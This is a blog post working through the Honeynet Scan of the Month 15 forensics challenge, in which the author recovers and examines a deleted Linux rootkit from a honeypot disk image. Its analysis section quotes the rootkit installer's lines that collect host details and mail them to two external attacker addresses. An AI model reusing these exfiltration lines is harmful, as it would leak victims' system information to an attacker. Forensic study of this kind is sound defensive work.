Solving Honeynet scan of the month 15

In this post I’m doing an assignment given by Tero Karvinen on his Linux server course about computer forensics by solving one of the honeynet scan of the month. I’m going to do this on my desktop computer. The computer is i5-3570k (4X, 3,8GHz, 6M) 16GB RAM, 2x Asus GeForce GTX 560 TI in SLI mode. Using the ubuntu live-USB.

The assignment

The assignment is to solve the Honeynet scan of the month 15.

On 15 March. 2001, a Linux honeypot was successfully compromised, a rootkit was download to the / partition and then deleted from the system. Your mission is to find and recover the deleted rootkit. If you are not sure where to begin on conducting this forensic analysis and recover the rootkit, we highly reccommend you start with the Forensic Challenge. The steps you will have to follow for the rootkit recovery are similar to the steps discussed there. We have posted only the / partion for download to keep this challenge simple. The compressed image is 13MB, (honeynet.tar.gz) ‘MD5=0dff8fb9fe022ea80d8f1a4e4ae33e21’. Once you have downloaded, untarred, and unzipped the partition image, it will be 255 MB and the checksum should be ‘MD5=5a8ebf5725b15e563c825be85f2f852e’.

  1. Show step by step how you identify and recover the deleted rootkit from the / partition.
  2. What files make up the deleted rootkit?

Bonus Question:
Was the rootkit ever actually installed on the system? How do you know?

Bonus Queston 2: (added by my teacher)

What information has the attacker left behind about himself?

Preparations

Downloading the ‘.tar.gz’. The url is on the assignment in a link, I downloaded and saved the link to desktop.

Unpacked the package with ‘tar’ (the x tells the command to unpack and the f tells the file location) [1]

tar xf honeynet.tar.gz

It unpacked a folder called ‘honeynet’ containing a ‘readme’ file and a ‘honeypot.hda8.dd’ file.

Starting the forensics

I needed to find out the files that have been deleted from the file system. To do this I used the command ‘tsk_recover’ [2]

To use the command, I needed to have the ‘sleuthkit’ installed.

sudo apt-get update
sudo apt-get install sleuthkit -y

Then to work:

mkdir deleted
tsk_recover honeypot.hda8.dd deleted/

I found out a tar gz file called ‘lk.tgz’, which I suspected to be the rootkit because of its size and because it was a package, also there was no other file that looked anything like one. I unpacked it with ‘tar’.

tar xf lk.tgz

This unpacked a folder called ‘last’. Containing a list of files with some of them having a familiar name.

drwxr-xr-x 2 xubuntu xubuntu    500 Feb 26  2001 ./
drwxrwxr-x 5 xubuntu xubuntu    120 Sep 16 10:44 ../
-rwxr-xr-x 1 xubuntu xubuntu   1345 Sep  9  1999 cleaner*
-rwxr-xr-x 1 xubuntu xubuntu  19840 Feb 26  2001 ifconfig*
-rw-r--r-- 1 xubuntu xubuntu   3278 Jan 27  2001 inetd.conf
-rwx------ 1 xubuntu xubuntu   3713 Mar  3  2001 install*
-rwxr-xr-x 1 xubuntu xubuntu   4620 Feb 26  2001 last.cgi*
-rwx------ 1 xubuntu xubuntu   7165 Feb 26  2001 linsniffer*
-rwx------ 1 xubuntu xubuntu     75 Feb 26  2001 logclear*
-rwxr-xr-x 1 xubuntu xubuntu     79 Feb 26  2001 lsattr*
-rwxr-xr-x 1 xubuntu xubuntu 632066 Feb 26  2001 mkxfs*
-rwxr-xr-x 1 xubuntu xubuntu  35300 Feb 26  2001 netstat*
-rw-r--r-- 1 xubuntu xubuntu      1 Feb 26  2001 pidfile
-rwxr-xr-x 1 xubuntu xubuntu  33280 Feb 26  2001 ps*
-rw-r--r-- 1 xubuntu xubuntu    708 Mar  3  2001 s
-rwxr-xr-x 1 xubuntu xubuntu   4060 Feb 26  2001 sense*
-rw-r--r-- 1 xubuntu xubuntu  11407 Jan 27  2001 services
-rwx------ 1 xubuntu xubuntu   8268 Feb 26  2001 sl2*
-rwxr-xr-x 1 xubuntu xubuntu 611931 Feb  8  2002 ssh*
-rw-r--r-- 1 xubuntu xubuntu    880 Oct 22  2000 ssh_config
-rw-r--r-- 1 xubuntu xubuntu    688 Feb 26  2001 sshd_config
-rw------- 1 xubuntu xubuntu    540 Oct 22  2000 ssh_host_key
-rw-r--r-- 1 xubuntu xubuntu    344 Oct 22  2000 ssh_host_key.pub
-rw------- 1 xubuntu xubuntu    512 Oct 22  2000 ssh_random_seed
-rwxr-xr-x 1 xubuntu xubuntu  53588 Feb 26  2001 top*

The folder contains two most important files, ‘install’ and ‘cleaner’. The attacker ran the ‘install’ script, which installs the rootkit. After that the cleaner script removes lines from log files to clean up traces of the attacker.

Was the rootkit installed on the system?

Yes. Here’s how I found out:

I needed to mount the DD file to better read its contents. [3]

mkdir sda1
sudo mount -o "loop,nodev,noexec,ro" honeypot.hda8.dd sda1/

The option ‘-o’ gives us the ability to add options to the mount. Here, we gave four options:

  • loop’: lets us treat the file like a block device to allow us to interact with the file system as it were mounted as a device [4]
  • ‘nodev’: it does not interpret character or block special devices on the file system
  • ‘noexec’: does not allow direct execution of any binaries on the mounted file system
  • ‘ro’: mount the filesystem as read-only

Now to see if the rootkit had modified the files inside the file image, for example the ‘netstat’ file:

sda1/bin$ ll | grep "netstat"
-rwxr-xr-x 1 root root 35300 Feb 26 2001 netstat*

Here’s the information again of the rootkit’s own netstat file:

honeynet/deleted/last$ ll | grep "netstat"
-rwxr-xr-x 1 xubuntu xubuntu  35300 Feb 26  2001 netstat*

It’s clearly a match, which tells us that the rootkit was installed on the system.

What information the attacker left about himself?

I noticed, that the attacker is or at leasts speaks Romanian, because many of the files were written in the language. Also, the attacker has set the install script to mail himself the information about the computer.

echo "* Info : $(uname -a)" >> computer
echo "* Hostname : $(hostname -f)" >> computer
echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> computer
echo "* Uptime : $(uptime)" >> computer
echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> computer
echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> computer
echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> computer
echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> computer
echo "* Spatiu Liber: $(df -h)" >> computer
echo "* Gata ! Trimitem Mailul ...Asteapta Te Rog "
cat computer | mail -s "placinte" last@linuxmail.org
cat computer | mail -s "roote" bidi_damm@yahoo.com

Seeing from this, he is probably the owner of the e-mails ‘last@linuxmail.org’ and ‘bidi_damm@yahoo.com’.

Sources

[1] AskUbuntu ‘tar’

[2][3] Tero Karvinen ‘tsk_recover’, ‘mount’

[4] AskUbuntu ‘loop’

 

Miro Metsänheimo

A software developer from Finland born in -92. I'm passionate about computers and technology. Feel free to message me about anything!

 

Leave a Reply

Share On Facebook
Share On Twitter
Share On Google Plus
Share On Linkdin